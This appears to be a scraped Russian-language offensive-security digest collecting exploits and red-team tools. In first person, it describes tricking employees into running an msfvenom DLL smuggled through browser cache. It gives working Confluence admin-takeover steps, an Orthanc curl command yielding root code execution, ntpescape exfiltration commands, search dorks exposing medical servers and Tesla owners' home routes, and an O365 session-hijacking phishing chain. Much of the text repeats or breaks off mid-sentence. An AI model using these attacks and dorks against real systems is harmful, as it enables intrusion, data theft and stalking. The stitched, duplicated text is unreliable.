https://sensepost.com/blog/2023/browsers-cache-smuggling/
Конфиг Nginx:
Я использую социальную инженерию, чтобы заставить сотрудников запустить мой код и получить доступ к их системе.Простая техника, чтобы доставить вредонос на машину цели, не заставляя ее ничего скачивать. Суть в том, чтобы отдать
Я звоню им и говорю, что я из ИТ-поддержки, прошу перейти на "официальный" сайт с PowerShell-скриптом, который им нужно запустить, чтобы решить какую-то выдуманную проблему.
Но EDR блокируют подозрительные скрипты, поэтому я хотел найти более скрытный способ доставки полезной нагрузки целевым пользователям.
DLL с пейлоадом из msfvenom как изображение, и заставить браузер его закэшировать. А дальше развить атаку, используя комбинацию из DLL Hijacking в связке с социальной инженерией.Конфиг Nginx:
location /calc.dll {
types { } default_type image/jpeg;
add_header Tag DLLHERE;
}
Найти файл с тегом в кэше:Select-String "DLLHERE" *
https://github.com/vchan-in/CVE-2023-35078-Exploit-POC
Remote Unauth API Access in MobileIron Core (CVE-2023-35078)
Mobile Device Management системы привлекательны для злоумышленников, так как их компрометация обеспечивает доступ к тысячам мобильных устройств.
CISA и NCSC-NO предупреждают о возможности широкого использования уязвимостей Ivanti в сетях государственного и частного секторов.
Пример использования:
Remote Unauth API Access in MobileIron Core (CVE-2023-35078)
Mobile Device Management системы привлекательны для злоумышленников, так как их компрометация обеспечивает доступ к тысячам мобильных устройств.
CISA и NCSC-NO предупреждают о возможности широкого использования уязвимостей Ivanti в сетях государственного и частного секторов.
Пример использования:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txtGitHub
GitHub - vchan-in/CVE-2023-35078-Exploit-POC: CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC
CVE-2023-35078 Remote Unauthenticated API Access Vulnerability Exploit POC - vchan-in/CVE-2023-35078-Exploit-POC
https://github.com/godaddy/tartufo
tartufo — это утилита, которая сканирует репозитории в поисках случайно оставленных токенов и учетных данных.
Она проверяет всю историю коммитов каждой существующей ветки и ищет секреты, используя регулярки и проверяя энтропию.
Установка:
Сканировать удаленный репозиторий:
Локальный:
tartufo — это утилита, которая сканирует репозитории в поисках случайно оставленных токенов и учетных данных.
Она проверяет всю историю коммитов каждой существующей ветки и ищет секреты, используя регулярки и проверяя энтропию.
Установка:
pip install tartufoСканировать удаленный репозиторий:
tartufo scan-remote-repo git@github.com:my_user/my_repo.gitЛокальный:
tartufo scan-local-repo /path/to/your/git/repohttps://github.com/blasty/unwyze
Wyze Cam v3 RCE Exploit
Эксплоит комбинирует две уязвимости:
1. Обход аутентификации DTLS в демоне iCamera
2. Переполнение буфера стека при парсинге json
и позволяет получить шелл, зная IP камеры.
Уязвимые версии:
Wyze Cam v3 RCE Exploit
Я исследовал прошивку Wyze Cam V3 в рамках участия в Pwn2Own Toronto и нашел несколько критических уязвимостей. После того, как я написал эксплоит и собирался вылетать на конференцию, я узнал, что компания Wyze выпустила обновление прошивки.
Эксплоит комбинирует две уязвимости:
1. Обход аутентификации DTLS в демоне iCamera
2. Переполнение буфера стека при парсинге json
и позволяет получить шелл, зная IP камеры.
Уязвимые версии:
4.36.10.4054, 4.36.11.4679 и 4.36.11.5859https://github.com/cosad3s/postleaks
postleaks — это сканер воркспейсов Postman, который умеет находить конфиденциальное в общедоступном.
Postman позволяет делиться шаблонами запросов к API и объединять их в воркспейсы. Разработчики часто забывают в них недокументированные эндпоинты и учетные данные.
Установка:
Использование:
postleaks — это сканер воркспейсов Postman, который умеет находить конфиденциальное в общедоступном.
Postman позволяет делиться шаблонами запросов к API и объединять их в воркспейсы. Разработчики часто забывают в них недокументированные эндпоинты и учетные данные.
Установка:
pip3 install postleaks
Использование:
postleaks -k <ключевое слово> (домен/компания)
GitHub
GitHub - cosad3s/postleaks: Search for sensitive data in Postman public library.
Search for sensitive data in Postman public library. - cosad3s/postleaks
https://github.com/pentagridsec/archive_pwn
archive pwn — это утилита на Python для создания zip-, tar- и cpio-архивов, которые эксплуатирует Zip Slip уязвимости.
Благодаря таким архивам, файлы можно распаковать в произвольное место на системе. В комбинации с другими уязвимостями, приводит к полной компрометации системы.
archive pwn — это утилита на Python для создания zip-, tar- и cpio-архивов, которые эксплуатирует Zip Slip уязвимости.
Благодаря таким архивам, файлы можно распаковать в произвольное место на системе. В комбинации с другими уязвимостями, приводит к полной компрометации системы.
GitHub
GitHub - pentagridsec/archive_pwn: A Python-based tool to create zip, tar and cpio archives to exploit common archive library issues…
A Python-based tool to create zip, tar and cpio archives to exploit common archive library issues and developer mistakes - pentagridsec/archive_pwn
https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off-4e5
Сравнение утилит для поиска поддоменов. Запуск "из коробки" на сайте популярной авиакомпании с широким скоупом Delta Airlines и авиакомпании поменьше — Spirit Airlines.
Нашел больше всего поддоменов — BBOT.
Самые быстрые — Subfinder и Findomain.
Поощрительный приз — theHarvester.
Примечательно, что статью написала компания, чей сканер занял первое место. Количество результатов объясняют использованием API subdomain.center от неизвестной Pwning Syndicate, которое генерирует поддомены с помощью ML.
Сравнение утилит для поиска поддоменов. Запуск "из коробки" на сайте популярной авиакомпании с широким скоупом Delta Airlines и авиакомпании поменьше — Spirit Airlines.
Нашел больше всего поддоменов — BBOT.
Самые быстрые — Subfinder и Findomain.
Поощрительный приз — theHarvester.
Примечательно, что статью написала компания, чей сканер занял первое место. Количество результатов объясняют использованием API subdomain.center от неизвестной Pwning Syndicate, которое генерирует поддомены с помощью ML.
Пока не вчитывался в новую CVE-2023-22518 10/10, но знаю о CVE-2023-22515 и думаю, что они похожи.
То, почему она стала возможна, заключается в особенностях маршрутизации внутри фреймворка, который использует Confluence.
А работает он на базе Apache Struts, который, в свою очередь, использует XWork.
Это важно, потому что особенность XWork позволяет определять действия
А еще XWork умеет взаимодействовать с геттерами и сеттерами с помощью CGI-параметров. Добавим к прошлому URL
У
Ну, вы поняли. Раскрутив всю цепочку из геттеров, можно дойти до самого главного класса
Если мы его переопределим, то сможем заново инициализировать приложение. Для этого достаточно отправить запрос https://<confluence>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
А дальше открыть
https://<confluence>/setup/setupadministrator-start.action
поменять пароль админа и зайти.
Сам Confluence организует работу в куче компаний, поэтому его компрометация грозит получением доступа над всем воркспейсом сотрудников.
А эксплоит под новую CVE вы можете взять тут https://github.com/sanjai-AK47/CVE-2023-22518
То, почему она стала возможна, заключается в особенностях маршрутизации внутри фреймворка, который использует Confluence.
А работает он на базе Apache Struts, который, в свою очередь, использует XWork.
Это важно, потому что особенность XWork позволяет определять действия
"Action" в виде Java-классов. Открываем страницу http://<confluence>/login.action, у приложения вызывается метод "execute" класса "Login".А еще XWork умеет взаимодействовать с геттерами и сеттерами с помощью CGI-параметров. Добавим к прошлому URL
?Id=123 и вызовем setId("123") из уже знакомого Login.У
Login есть метод, который возвращает объект BootstrapStatusProvider, мы тоже можем его вызвать. А тот, в свою очередь, расширяет ActionSupport и наследует уже все его методы.Ну, вы поняли. Раскрутив всю цепочку из геттеров, можно дойти до самого главного класса
ApplicationConfig. Он управляет конфигурацией приложения и у него, как можно было доказаться, есть сеттер setupComplete.Если мы его переопределим, то сможем заново инициализировать приложение. Для этого достаточно отправить запрос https://<confluence>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
А дальше открыть
https://<confluence>/setup/setupadministrator-start.action
поменять пароль админа и зайти.
Сам Confluence организует работу в куче компаний, поэтому его компрометация грозит получением доступа над всем воркспейсом сотрудников.
А эксплоит под новую CVE вы можете взять тут https://github.com/sanjai-AK47/CVE-2023-22518
Atlassian
Confluence | Your Remote-Friendly Team Workspace | Atlassian
Make the impossible, possible with Confluence Cloud. Your team workspace trusted for documentation, project collaboration, Jira integrations, and more!
https://infosecwriteups.com/how-i-hacked-1000-tesla-cars-using-osint-4cd837b8c530
Censys:
Владельцы Tesla открывают свои админки TeslaMate без аутентификации. Там данные о машине, статистика, аналитика и все маршруты, включая дорогу до дома.
Censys:
"TESLAMATE" and "Dashboards" and not "sign_in"Владельцы Tesla открывают свои админки TeslaMate без аутентификации. Там данные о машине, статистика, аналитика и все маршруты, включая дорогу до дома.
https://github.com/ShielderSec/poc/tree/main/CVE-2023-33466
Orthanc — это ПО с открытым исходным кодом для управления, обмена и визуализации данных медицинских исследований пациентов.
В версиях < 1.12.0 Orthanc подвержен уязвимости, связанной с перезаписью произвольных файлов (CVE-2023-33466), которая позволяет получить RCE в системе.
Shodan:
Пример использования:
Orthanc — это ПО с открытым исходным кодом для управления, обмена и визуализации данных медицинских исследований пациентов.
В версиях < 1.12.0 Orthanc подвержен уязвимости, связанной с перезаписью произвольных файлов (CVE-2023-33466), которая позволяет получить RCE в системе.
Shodan:
"Orthanc Secure Area"Пример использования:
python3 exploit.py --url "http://localhost" --config-path "/tmp/orthanc.json" --creds "orthanc:orthanc"
curl -H "Authorization: Basic $(echo -n "orthanc:orthanc" | base64)" -X POST http://localhost/tools/execute-script -d "local handle = io.popen('id'); print(handle:read('*a'))"
uid=0(root) gid=0(root) groups=0(root)GitHub
poc/CVE-2023-33466 at main · ShielderSec/poc
Shielder's public proof of concepts collection. Contribute to ShielderSec/poc development by creating an account on GitHub.
https://github.com/X1r0z/ActiveMQ-RCE
ActiveMQ RCE (CVE-2023-46604)
Подробнее
https://phoenix.security/vuln-apache-activemq-cve-2023-46604/
ActiveMQ RCE (CVE-2023-46604)
Подробнее
https://phoenix.security/vuln-apache-activemq-cve-2023-46604/
GitHub
GitHub - X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具
ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具. Contribute to X1r0z/ActiveMQ-RCE development by creating an account on GitHub.
https://hackerone.com/reports/2190808
Баг баунти Министерства обороны США 🙂
За все время сдано более 26к уязвимостей и это без вознаграждения. Не знаю, кто пишет такие сервисы (не индусы), но бюджет программы полностью окупает все ошибки.
1) Перейдите по следующему URL-адресу: https://█████████.
Там вы увидите, что вошли в систему как пользователь Sys Admin. Эта роль позволяет любому пользователю загружать файлы, добавлять пользователей, изменять разрешения для пользователей и удалять пользователей.
Баг баунти Министерства обороны США 🙂
За все время сдано более 26к уязвимостей и это без вознаграждения. Не знаю, кто пишет такие сервисы (не индусы), но бюджет программы полностью окупает все ошибки.
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: User automatically...
**Description:**
Any user can access the Administration section of the following URL: https:// ███
When the user goes to the following domain they are automatically logged in as " ████████" which is...
Any user can access the Administration section of the following URL: https:// ███
When the user goes to the following domain they are automatically logged in as " ████████" which is...
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Google Calendar RAT — это PoC Command&Control (C2) поверх событий Google Календаря.
Пригодится, когда сложно развернуть полноценную инфраструктуру Red Team.
Для использования GRC требуется только учетная запись Gmail. Скрипт создает «скрытый канал», используя события в Google Календаре и общаясь с целью с помощью их описания.
Недавно его использование уже было замечено в «дикой среде» https://thehackernews.com/2023/11/google-warns-of-hackers-absing-calendar.html
Google Calendar RAT — это PoC Command&Control (C2) поверх событий Google Календаря.
Пригодится, когда сложно развернуть полноценную инфраструктуру Red Team.
Для использования GRC требуется только учетная запись Gmail. Скрипт создает «скрытый канал», используя события в Google Календаре и общаясь с целью с помощью их описания.
Недавно его использование уже было замечено в «дикой среде» https://thehackernews.com/2023/11/google-warns-of-hackers-absing-calendar.html
GitHub
GitHub - MrSaighnal/GCR-Google-Calendar-RAT: Google Calendar RAT is a PoC of Command&Control over Google Calendar Events
Google Calendar RAT is a PoC of Command&Control over Google Calendar Events - MrSaighnal/GCR-Google-Calendar-RAT
https://github.com/evallen/ntpescape
ntpescape — это инструмент, позволяющий скрытно осуществлять эксфильтрацию данных с компьютера, использующего протокол сетевого времени (NTP).
Он содержит множество функций, которые делают процесс эксфильтрации очень сложным для обнаружения:
— все сообщения встраиваются в пакеты легитимного NTP-клиента и не содержат никакой дополнительной информации
— все передаваемые данные шифруются с помощью секретного ключа, поэтому антивирусы не смогут обнаружить передачу данных, поскольку они будут выглядеть статистически случайными
— сервер-получатель отвечает на все отправленные клиентом пакеты так, как если бы он был настоящим NTP-сервером, отвечая реалистичными временными метками
— получатель даже имитирует собственные обновления, случайным образом выбирая Stratum-1 NTP-сервер, с которого он периодически делает вид, что "обновляется"
— все используемые данные слегка рандомизируются, чтобы имитировать реальные серверы и затруднить обнаружение пакетов с помощью IDS
Клонировать и собрать:
Запустить ресивер:
Отправить на него данные:
ntpescape — это инструмент, позволяющий скрытно осуществлять эксфильтрацию данных с компьютера, использующего протокол сетевого времени (NTP).
Он содержит множество функций, которые делают процесс эксфильтрации очень сложным для обнаружения:
— все сообщения встраиваются в пакеты легитимного NTP-клиента и не содержат никакой дополнительной информации
— все передаваемые данные шифруются с помощью секретного ключа, поэтому антивирусы не смогут обнаружить передачу данных, поскольку они будут выглядеть статистически случайными
— сервер-получатель отвечает на все отправленные клиентом пакеты так, как если бы он был настоящим NTP-сервером, отвечая реалистичными временными метками
— получатель даже имитирует собственные обновления, случайным образом выбирая Stratum-1 NTP-сервер, с которого он периодически делает вид, что "обновляется"
— все используемые данные слегка рандомизируются, чтобы имитировать реальные серверы и затруднить обнаружение пакетов с помощью IDS
Клонировать и собрать:
git clone git@github.com:evallen/ntpescape.git
make build
Запустить ресивер:
sudo ./recv
Отправить на него данные:
echo "hello, world" | ./send -d <put_server_here>:123 -tm 0 -tM 0
GitHub
GitHub - evallen/ntpescape: NTP Exfiltration Tool
NTP Exfiltration Tool. Contribute to evallen/ntpescape development by creating an account on GitHub.
Собирать, структурировать и визуализировать данные удобно с помощью Maltego. Но в бесплатной версии ты быстро спотыкаешься об ограничения, а платная явно не окупает кровных исследователя.
Поэтому пришлось вспоминать о бесплатных альтернативах. Главными критериями были — возможность написания модулей (главное, чтобы это было просто и понятно) и схожесть с Maltego в построении графов с преобразованиями.
Вот несколько инструментов:
— LinkScope - копия Maltego, но бесплатная и более стабильная. Нет жесткий ограничений, как в Maltego Community (клиент вообще с открытым исходным кодом), но есть платная версия с "Installation Assistance", "Custom Compiled Binaries", "Premium Resolutions", "Commercial use" за
— SpiderFoot — имеет веб-интерфейс (но можно пользоваться и из командной строки), более 200 модулей "из коробки" и интеграцию с TOR для поиска по Dark Web. Лидер по количеству встроенных инструментов, имеет платную версию с 2FA, поддержкой и Attack Surface мониторингом.
— OSINTBuddy — попытка осовременить Maltego и немного изменить подход к визуализации. Плагинов немного, но пишутся они максимально просто (проще, чем для всех остальных упомянутых программ) и их можно выполнять step-by-step прямо из веб-консоли. Большая часть OSINTBuddy разработана в одиночку, имеет свой не активный форум. Полностью бесплатный.
Поэтому пришлось вспоминать о бесплатных альтернативах. Главными критериями были — возможность написания модулей (главное, чтобы это было просто и понятно) и схожесть с Maltego в построении графов с преобразованиями.
Вот несколько инструментов:
— LinkScope - копия Maltego, но бесплатная и более стабильная. Нет жесткий ограничений, как в Maltego Community (клиент вообще с открытым исходным кодом), но есть платная версия с "Installation Assistance", "Custom Compiled Binaries", "Premium Resolutions", "Commercial use" за
$575, которая явно нам не понадобится.— SpiderFoot — имеет веб-интерфейс (но можно пользоваться и из командной строки), более 200 модулей "из коробки" и интеграцию с TOR для поиска по Dark Web. Лидер по количеству встроенных инструментов, имеет платную версию с 2FA, поддержкой и Attack Surface мониторингом.
— OSINTBuddy — попытка осовременить Maltego и немного изменить подход к визуализации. Плагинов немного, но пишутся они максимально просто (проще, чем для всех остальных упомянутых программ) и их можно выполнять step-by-step прямо из веб-консоли. Большая часть OSINTBuddy разработана в одиночку, имеет свой не активный форум. Полностью бесплатный.
GitHub
GitHub - AccentuSoft/LinkScope_Client: Repository for the LinkScope Client software.
Repository for the LinkScope Client software. Contribute to AccentuSoft/LinkScope_Client development by creating an account on GitHub.
https://hadess.io/74-methods-for-privilege-escalationpart-2/
In this article, we examine 74 methods of improving accessibility
In this article, we examine 74 methods of improving accessibility
HADESS
74 Methods for Privilege Escalation (Part 2) - HADESS
In this article, we examine 74 methods of improving accessibility (second part). For more information about this concept, visit the Hadess blog.
The Triforce of Initial Access
В то время как редтимеры любят обсуждать и почти поэтично описывать свои наборы C2-фреймворков, возможности уклонения от EDR и быстрое использование эксплойтов N-day в качестве оружия, то, что редко упоминается, — это старые добрые способы получения первоначального доступа.
Подготовка к операции всегда будет выступать решающим фактором в том, нажмет ли кто-то на вашу ссылку, с радостью выполнит инструкции, которые вы придумаете или поделится секретом от TOTP.
Поэтому сначала я предпочитаю использовать фишинг учетных записей Microsoft Office 365, чтобы получить доступ к Teams, Outlook, OneDrive, OneNote и SharePoint.
Из них можно получить достаточно информации, чтобы начать развивать более грамотную атаку.
Что можно найти:
— Пароли в открытом виде в Outlook или OneNote или Teams
— Паспорта, водительские удостоверения, свидетельства о браке и другие документы в OneDrive
1 Этап — использование evilginx с готовыми фишлетами для o365. После получения ESTSAUTHPERSISTENT- и ESTSAUTH-кук, вы можете вставить их в свой собственный браузер и эффективно пройти аутентификацию без необходимости вводить пароль пользователя или иметь дело с MFA. Это обычно называется перехватом сеанса и является более или менее стандартом де-факто в современном фишинге.
2 Этап — Rogue Office 365 and Azure (active) Directory tools или ROADtools. Эту библиотеку можно использовать как только вы получите первоначальный доступ к Entra ID-клиенту. От манипуляции с токенами, PRT Injection и регистрации устройств до возможности аутентификации практически из любого контекста: пароли, сертификаты, файлы cookie, билеты Kerberos, Access-токены, PRT и многое другое возможно с помощью RoadTX.
3 Этап — TeamFiltration. Инструмент, который позволяет автоматически извлекать данные из Microsoft Office, включая электронные письма, вложения электронной почты, чаты Teams с вложениями, файлы из OneDrive из SharePoint, а также сведения о пользователях, группах и клиентах из Entra ID.
У него существует несколько Invoke-альтернатив для постэксплуатации: AADInternals, AzureHound и GraphRunner.
Все эти этапы объединяет скрипт под названием Bobber. Он ожидает получения кук, а дальше сам вызывает все остальные инструменты по цепочке. Его можно также найти на Github https://github.com/Flangvik/Bobber.
В то время как редтимеры любят обсуждать и почти поэтично описывать свои наборы C2-фреймворков, возможности уклонения от EDR и быстрое использование эксплойтов N-day в качестве оружия, то, что редко упоминается, — это старые добрые способы получения первоначального доступа.
Подготовка к операции всегда будет выступать решающим фактором в том, нажмет ли кто-то на вашу ссылку, с радостью выполнит инструкции, которые вы придумаете или поделится секретом от TOTP.
Поэтому сначала я предпочитаю использовать фишинг учетных записей Microsoft Office 365, чтобы получить доступ к Teams, Outlook, OneDrive, OneNote и SharePoint.
Из них можно получить достаточно информации, чтобы начать развивать более грамотную атаку.
Что можно найти:
— Пароли в открытом виде в Outlook или OneNote или Teams
— Паспорта, водительские удостоверения, свидетельства о браке и другие документы в OneDrive
1 Этап — использование evilginx с готовыми фишлетами для o365. После получения ESTSAUTHPERSISTENT- и ESTSAUTH-кук, вы можете вставить их в свой собственный браузер и эффективно пройти аутентификацию без необходимости вводить пароль пользователя или иметь дело с MFA. Это обычно называется перехватом сеанса и является более или менее стандартом де-факто в современном фишинге.
2 Этап — Rogue Office 365 and Azure (active) Directory tools или ROADtools. Эту библиотеку можно использовать как только вы получите первоначальный доступ к Entra ID-клиенту. От манипуляции с токенами, PRT Injection и регистрации устройств до возможности аутентификации практически из любого контекста: пароли, сертификаты, файлы cookie, билеты Kerberos, Access-токены, PRT и многое другое возможно с помощью RoadTX.
3 Этап — TeamFiltration. Инструмент, который позволяет автоматически извлекать данные из Microsoft Office, включая электронные письма, вложения электронной почты, чаты Teams с вложениями, файлы из OneDrive из SharePoint, а также сведения о пользователях, группах и клиентах из Entra ID.
У него существует несколько Invoke-альтернатив для постэксплуатации: AADInternals, AzureHound и GraphRunner.
Все эти этапы объединяет скрипт под названием Bobber. Он ожидает получения кук, а дальше сам вызывает все остальные инструменты по цепочке. Его можно также найти на Github https://github.com/Flangvik/Bobber.
GitHub
GitHub - Flangvik/Bobber: Bounces when a fish bites - Evilginx database monitoring with exfiltration automation
Bounces when a fish bites - Evilginx database monitoring with exfiltration automation - Flangvik/Bobber
https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/
К десяткам способам получить NTLM-хэш добавился еще один. «linking to remote SQL Server tables» из Microsoft Access автоматически передает хэши пользователей Windows через 80 порт.
К десяткам способам получить NTLM-хэш добавился еще один. «linking to remote SQL Server tables» из Microsoft Access автоматически передает хэши пользователей Windows через 80 порт.
Check Point Research
Abusing Microsoft Access "Linked Table" Feature to Perform NTLM Forced Authentication Attacks - Check Point Research
What is NTLM? What common attacks exist against it? NTLM is an extremely deprecated authentication protocol introduced by Microsoft in 1993. It is a challenge-response protocol: the server keeps a secret called an “NTLM hash” derived from the user’s password…
https://haxx.in/posts/hacking-canon-imageclass/
Очередное (в этом году) переполнение буфера, на этот раз в принтерах CANON.
Автор позаботился и оставил ссылку на свой тулкит https://github.com/blasty/canon/
Очередное (в этом году) переполнение буфера, на этот раз в принтерах CANON.
Автор позаботился и оставил ссылку на свой тулкит https://github.com/blasty/canon/